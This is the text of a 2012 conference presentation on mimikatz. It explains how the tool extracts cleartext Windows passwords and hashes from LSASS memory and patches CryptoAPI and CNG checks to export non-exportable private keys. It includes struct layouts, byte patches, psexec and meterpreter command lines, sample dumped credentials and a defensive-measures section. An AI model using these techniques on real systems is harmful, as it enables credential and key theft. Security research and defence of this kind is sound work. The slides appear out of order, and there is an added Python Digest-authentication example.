mimikatz :: sekurlsa
Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz :: sekurlsa :: kerberos
Let's login with a normal account
After credentials protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession to insert the data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession to insert the data in KerbLogonSessionList

Call stacks printed by the trap:
lsasrv!LsaProtectMemory
kerberos!KerbHideKey
kerberos!KerbCreatePrimaryCredentials
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
<- Kerberos ticket part? Maybe ;)

lsasrv!LsaProtectMemory
kerberos!KerbHidePassword
kerberos!KerbCreateLogonSession
kerberos!SpAcceptCredentials
<- Kerberos part for the password

lsasrv!LsaProtectMemory
msv1_0!NlpAddPrimaryCredential
msv1_0!SspAcceptCredentials
msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory
wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory
tspkg!TSHidePassword
tspkg!SpAcceptCredentials
mimikatz :: sekurlsa :: kerberos (nt6) :: workflow
[workflow diagram] LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbGlobalLogonSessionTable (RtlLookupElementGenericTableAvl) -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) :: workflow
[workflow diagram] LsaEnumerateLogonSessions -> for each LUID -> kerberos!KerbLogonSessionList (search the linked list for the LUID) -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    /* […] */
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa :: demo time
Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos "hu?"
Ok, it works…
But why?
Not for all logons on NT5 (may need an unlock)
From my understanding of Microsoft's explanations:
- no need of passwords for the Kerberos protocol…
- all is based on the hash (not very sexy either)
Microsoft's implementation of Kerberos is full of logic…
- For password auth:
  • the password hash is the shared secret, but the password is kept in memory
- For full smartcard auth:
  • No password on the client
  • No hash on the client
  - NTLM hash on the client…
  - the KDC sent it back as a gift
mimikatz :: sekurlsa
All passwords in memory are encrypted, but in a reversible way, so that they can be used
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process to benefit from its keys when we called it
Can it be fun to decrypt outside the process?
- Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can use lsasrv.dll too and "imports" the keys LSASS initialized
- When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are in LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory NT5
Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESx
[diagram: the lsasrv key globals of the LSASS process are copied into mimikatz's own lsasrv instance, which then calls LsaUnprotectMemory]
- g_cbRandomKey: DWORD (256)
- g_pRandomKey: BYTE[g_cbRandomKey]
- g_pDESXKey: BYTE[144]
- g_Feedback: BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory NT6
Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES
[diagram: the lsasrv key globals of the LSASS process are copied into mimikatz's own lsasrv instance]
- InitializationVector: BYTE[16]
- h3DesKey, hAesKey: PKIWI_BCRYPT_KEY

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data; /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
mimikatz :: sekurlsa :: memo
Security Packages
Package        | Symbols                                                  | Type
tspkg          | tspkg!TSGlobalCredTable                                  | RTL_AVL_TABLE
wdigest        | wdigest!l_LogSessList                                    | LIST_ENTRY
livessp        | livessp!LiveGlobalLogonSessionList                       | LIST_ENTRY
kerberos (nt5) | kerberos!KerbLogonSessionList                            | LIST_ENTRY
kerberos (nt6) | kerberos!KerbGlobalLogonSessionTable                     | RTL_AVL_TABLE
msv1_0         | lsasrv!LogonSessionList, lsasrv!LogonSessionListCount    | LIST_ENTRY, ULONG

Protection Keys
Key  | NT 5 Symbols
RC4  | lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx | lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key  | NT 6 Symbols
     | lsasrv!InitializationVector
3DES | lsasrv!h3DesKey
AES  | lsasrv!hAesKey
mimikatz :: sekurlsa :: memo
Some commands:
mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234
        livessp :
         * n.t. (LUID KO)
mimikatz :: sekurlsa :: what we can do?
Basics
- No physical access to computer (first step to pass the hash, then pass the pass)
- No admin rights / system rights / debug privileges (…)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless)
- For privileged accounts, network login instead of interactive (when possible)
- Audit: pass the hash keeps traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks
More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic:
  * biometrics (it keeps the password somewhere and pushes it to Windows)
  * single sign on
- Stop shared secrets for authentication, push Public/Private stuff (like keys ;))
- Leave opportunities to stop retro-compatibility
- Disable faulty providers
  * Is it supported by Microsoft?
  * Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto :: what is it?
A little module that I wrote to:
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  * Even those which are "not" exportable
What the crypto module can do:
- List
  * Providers
  * Stores
  * Certificates
  * Keys
- Export
  * Certificates
    - public, in DER format
    - with private keys, in PFX format
  * Private keys in PVK format
    - it's cool, OpenSSL can deal with it too
- Patch
  * CryptoAPI in mimikatz context
  * CNG in LSASS context (again ;))
(figure: mod_mimikatz_crypto)
mimikatz :: crypto :: how it's protected?
Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  * At least without the master keys and/or password of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
- Yes, a computer/server opens a "session"
Export/Usage can be limited by:
- Password
- Popup
- Export/Archive flag not present
(slide annotations: "Constraint for most users", "Unavailable for computer keys")
certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi :: how it works?
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, …
- cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi :: how it's exported ( level)
(figure: Process -> CryptoAPI and RSA CSP: Load Private Key (DPAPI Decode) -> Ask to export Key -> Exportable? yes: Exported Key; no: NTE_BAD_KEY_STATE. Labelled "PLAYSKOOL")
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), it goes in rsaenh!CPExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
(figure label: Exportable)
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

before: .text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
after:  .text:0AC0B7CB 90                   nop
        .text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

before: .text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
after:  .text:0AC1F749 90                   nop
        .text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi :: limitations
Because:
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real life use
  * Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng :: how it works?
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
- It is, but it's not perfect…
mimikatz :: crypto :: cng :: how it's exported ( level)
(figure: Process -> CNG -> RPC -> KeyIso Service (LSASS Process): Load Private Key (DPAPI Decode) -> Ask to export Key -> Exportable? yes: Exported Key; no: NTE_NOT_SUPPORTED. LSASS annotated "NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP"; labelled "PLAYSKOOL")
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) -> ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.

mimikatz # crypto::exportKeys [user]
Clés CNG
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité : NON
        Taille clé    : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO ; mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) L'opération demandée n'est pas prise en charge.
(figure label: Exportable)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

before: .text:6C815210 75 1C    jnz short continue_key_export
after:  .text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng :: limitations
Patch operation needs some privileges:
- Admin (debug privilege)
- SYSTEM
mimikatz crypto::patchcng only deals with:
- Microsoft Software Key Storage Provider (maybe other algs than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
- certutil can…
mimikatz :: crypto :: patchcng :: bonus
After one admin patched LSASS, all users of the current system benefit from extra exports
- until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for export can work too
- Yeah, like the good old certutil

Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
- PFX files are protected by this password: mimikatz
Keys
- When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  * So yes, mimikatz can export it
mimikatz :: crypto :: what we can do?
Exactly the same as for sekurlsa, it will prevent access to accounts/computer
- no admin, no admin, no admin…
Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM
More in depth
- See what Microsoft can do with TPM from Windows 8
  * Virtual SmartCard seems promising
- Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  * Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do?
- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  * Play with tokens & privileges
  * Display SSDT x86 & x64
  * List minifilters actions
  * List Notifications (process, thread, image, registry)
  * List Objects hooks and procedures
  * …
- …
mimikatz :: that's all folks!
Thanks to / Merci à
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  * Partners and Sponsors, for sure
- Microsoft, to always consider it as normal/acceptable
- Security friends/community for their ideas & challenges
  * nagual, newsoft, mubix, …
- You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: history of « pass-the- » 1/2
Pass-the-hash
- 1997 - Unix modified SAMBA client for hashes usage, Paul Ashton (EIGEN)
- 2000 - Private version of a Windows « LSA Logon Session Editor », Hernan Ochoa (CoreSecurity)
- 2007 - TechEd Microsoft: Marc Murray (TrueSec) presents msvctl and provides some downloads of it
- 2007 - « Pass the hash toolkit » published, Hernan Ochoa (CoreSecurity)
- 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself, but in French so not famous ;))
2007 was the year of pass the hash!
Pass-the-ticket
- 04/2011 - wce (pass the hash toolkit evolution) provides Kerberos ticket support, Hernan Ochoa (Ampliasecurity)
mimikatz :: sekurlsa :: history of « pass-the- » 2/2
Pass-the-pass
- 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT6 and some XP SP3)
  * http://blog.gentilkiwi.com/securite/pass-the-pass
- 05/2011 – return of mimikatz, it dumps clear text passwords from WDigest provider (unlimited this time ;))
  * http://blog.gentilkiwi.com/securite/re-pass-the-pass
- 05/2011 – Some organizations opened cases to Microsoft about it…
…Lots of time…
- begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say a few words about mimikatz
- 03/2012 - Hernan Ochoa (Ampliasecurity) publishes at seclists that wce supports WDigest password extraction…
  * http://seclists.org/pen-test/2012/Mar/7
- 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
  * http://blog.gentilkiwi.com/securite/rere-pass-the-pass
- 03/2012 – yeah, once again… more curious, but Kerberos keeps passwords in memory
  * http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
- 08/2012 – sekurlsa module without injection at all (ultra safe)
  * http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition
mimikatz :: sekurlsa :: tspkg
because sometimes hash is not enough…
mimikatz :: sekurlsa :: tspkg :: what is it?
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDesktop users' experience
- http://technet.microsoft.com/library/cc772108.aspx
Relies on CredSSP with Credentials Delegation (= Account delegation)
- Specs: http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
First impression: it seems cool
- User does not have to type its password
- Password is not in the RDP file
- Password is not in user secrets
mimikatz :: sekurlsa :: tspkg :: questions
KB says that for it to work, we must enable « Default credentials » delegation
- "Default credentials: The credentials obtained when the user first logs on to Windows" - https://msdn.microsoft.com/library/bb204773.aspx
  * What? Our User/Domain/Password | Hash | Ticket? It seems…
- In all cases, the system seems to be vulnerable to pass-the-…
In what form? Our specs: [MS-CSSP]
- 2.2.1.2.1 TSPasswordCreds
  * The TSPasswordCreds structure contains the user's password credentials that are delegated to the server (or PIN).
    TSPasswordCreds ::= SEQUENCE {
        domainName [0] OCTET STRING,
        userName   [1] OCTET STRING,
        password   [2] OCTET STRING
    }
- Challenge response for authentication?
  * Server: YES (TLS, Kerberos)
  * Client: NO, password is sent to server…
So password resides somewhere in memory!
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz :: sekurlsa :: tspkg – symbols & theory
Let's explore some symbols
  – sounds cool… (thanks Microsoft!)
Let's imagine a scenario:
  – Enumerate all sessions to obtain
    • Username
    • Domain
    • LUID
  – Call tspkg!TSCredTableLocateDefaultCreds (relies on RtlLookupElementGenericTableAvl) with the LUID to obtain
    • a TS_CREDENTIAL
  – Call tspkg!TSObtainClearCreds (relies on LsaUnprotectMemory) with the TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) to get
    • a TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*
75016d1c          tspkg!TSObtainClearCreds = <no type information>
kd> x tspkg!*password*
75011b68          tspkg!TSDuplicatePassword = <no type information>
75011cd4          tspkg!TSHidePassword = <no type information>
750195ee          tspkg!TSRevealPassword = <no type information>
75012fbd          tspkg!TSUpdateCredentialsPassword = <no type information>
kd> x tspkg!*locate*
7501158b          tspkg!TSCredTableLocateDefaultCreds = <no type information>
mimikatz :: sekurlsa :: tspkg – workflow
[diagram] LsaEnumerateLogonSessions → for each LUID → tspkg!TSGlobalCredTable (RtlLookupElementGenericTableAvl) → KIWI_TS_CREDENTIAL → KIWI_TS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_TS_PRIMARY_CREDENTIAL {
    PVOID unk0;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Password;
} KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

typedef struct _KIWI_TS_CREDENTIAL {
#ifdef _M_X64
    BYTE unk0[108];
#elif defined _M_IX86
    BYTE unk0[64];
#endif
    LUID LocallyUniqueIdentifier;
    PVOID unk1;
    PVOID unk2;
    PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;
} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

mimikatz :: sekurlsa :: tspkg – demo time
sekurlsa::tspkg
mimikatz :: sekurlsa :: wdigest
because a clear text password over http/https is not cool
mimikatz :: sekurlsa :: wdigest – what is it?
“Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]” – Wikipedia, http://en.wikipedia.org/wiki/Digest_access_authentication
“Common Digest Authentication Scenarios:
  – Authenticated client access to a Web site
  – Authenticated client access using SASL
  – Authenticated client access with integrity protection to a directory service using LDAP” – Microsoft, http://technet.microsoft.com/library/cc778868.aspx
Again, it seems cool:
  – No password over the network, just hashes
  – No reversible password in Active Directory, hashes for each realm
    • Only with Advanced Digest authentication
mimikatz :: sekurlsa :: wdigest – what is it?
We speak about hashes, but what hashes? H = MD5(HA1:nonce:[…]:HA2)
  • HA1 = MD5(username:realm:password)
  • HA2 = MD5(method:digestURI[…])
Even after login HA1 may change… the realm comes from the server side and cannot be determined before the Windows logon
So the WDigest provider must keep the elements to compute responses for different servers:
  – Username
  – Realm (from the server)
  – Password
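Added example (not from the deck): the RFC 2617 Digest computation in Python, plus a small model of what a client-side provider has to retain. HA1 binds the server-chosen realm, so a provider that only holds HA1 values can answer only realms it has already seen; holding the password (the WDigest design described above) answers any realm, which is exactly why the password stays resident in LSASS. The RFC 2617 section 3.5 sample (user Mufasa, realm testrealm@host.com, password "Circle Of Life") is used as the worked value; "other.example" is a constructed second realm.

```python
import hashlib
from typing import Dict, Optional


def _md5(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password); the realm is chosen by the server, not the client."""
    return _md5(f"{username}:{realm}:{password}")


def ha2(method: str, uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (no entity-body hash)."""
    return _md5(f"{method}:{uri}")


def digest_response(h1: str, method: str, uri: str, nonce: str, nc: Optional[str] = None,
                    cnonce: Optional[str] = None, qop: Optional[str] = None) -> str:
    """H = MD5(HA1:nonce:nc:cnonce:qop:HA2) with qop (RFC 2617), MD5(HA1:nonce:HA2) without (RFC 2069)."""
    h2 = ha2(method, uri)
    if qop is None:
        return _md5(f"{h1}:{nonce}:{h2}")
    return _md5(f"{h1}:{nonce}:{nc}:{cnonce}:{qop}:{h2}")


class DigestClient:
    """What a client-side Digest provider must keep to answer challenges.
    password=...    models WDigest: the password stays resident, HA1 is derived per realm on demand.
    ha1_by_realm=   models the alternative: only per-realm HA1 values, so an unseen realm cannot be answered."""

    def __init__(self, username: str, password: Optional[str] = None,
                 ha1_by_realm: Optional[Dict[str, str]] = None) -> None:
        self.username = username
        self.password = password
        self.ha1_by_realm = dict(ha1_by_realm or {})

    def respond(self, realm: str, method: str, uri: str, nonce: str,
                nc: str = "00000001", cnonce: str = "0a4f113b", qop: str = "auth") -> str:
        if self.password is not None:
            h1 = ha1(self.username, realm, self.password)
        elif realm in self.ha1_by_realm:
            h1 = self.ha1_by_realm[realm]
        else:
            raise LookupError(f"no HA1 for realm {realm!r} and no password to derive one")
        return digest_response(h1, method, uri, nonce, nc, cnonce, qop)


# RFC 2617 section 3.5 sample exchange, reused here as the worked value.
RFC2617_SAMPLE = dict(username="Mufasa", realm="testrealm@host.com", password="Circle Of Life",
                      method="GET", uri="/dir/index.html", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",
                      nc="00000001", cnonce="0a4f113b", qop="auth")
RFC2617_RESPONSE = "6629fae49393a05397450978507c4ef1"


def rfc2617_check() -> bool:
    """Recompute the RFC 2617 sample response from its inputs."""
    s = RFC2617_SAMPLE
    h1 = ha1(s["username"], s["realm"], s["password"])
    return digest_response(h1, s["method"], s["uri"], s["nonce"], s["nc"], s["cnonce"], s["qop"]) == RFC2617_RESPONSE
```

A DigestClient built with password= answers any realm; one built only with ha1_by_realm= raises LookupError on a realm it has not seen, which is the trade-off WDigest resolves by keeping the password.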
mimikatz :: sekurlsa :: wdigest – theory
This time we know:
  – that WDigest keeps the password in memory « by protocol », for the HA1 digest
  – that LSASS loves to unprotect passwords with LsaUnprotectMemory (so it protects them with LsaProtectMemory)
LsaUnprotectMemory
  – At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE (x86)
  – Let's search for it in WDigest
  – Hypothesis seems verified
LsaProtectMemory
  – At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE (x86)
  – Let's search for it in WDigest
  – SpAcceptCredentials takes the clear password in its arguments
    • Protects it with LsaProtectMemory
    • Updates or inserts data in the doubly linked list wdigest!l_LogSessList

.text:7409D151 _DigestCalcHA1@8        call dword ptr [eax+0B4h]   ; LsaUnprotectMemory
.text:74096C69 _SpAcceptCredentials@16 call dword ptr [eax+0B0h]   ; LsaProtectMemory
mimikatz :: sekurlsa :: wdigest – workflow
[diagram] LsaEnumerateLogonSessions → for each LUID → wdigest!l_LogSessList → search the linked list for the LUID → KIWI_WDIGEST_LIST_ENTRY → LsaUnprotectMemory → password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    […]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

mimikatz :: sekurlsa :: wdigest – demo time
sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp – how?
Actually, I've only used a logical (empirical) approach to search for passwords…
  – Protocol reading
  – Symbols searching
~ Boring ~… let's be more brutal this time: make a WinDbg trap!

0: kd> !process 0 0 lsass.exe
PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
    DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
    Image: lsass.exe
0: kd> .process /i 83569040
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
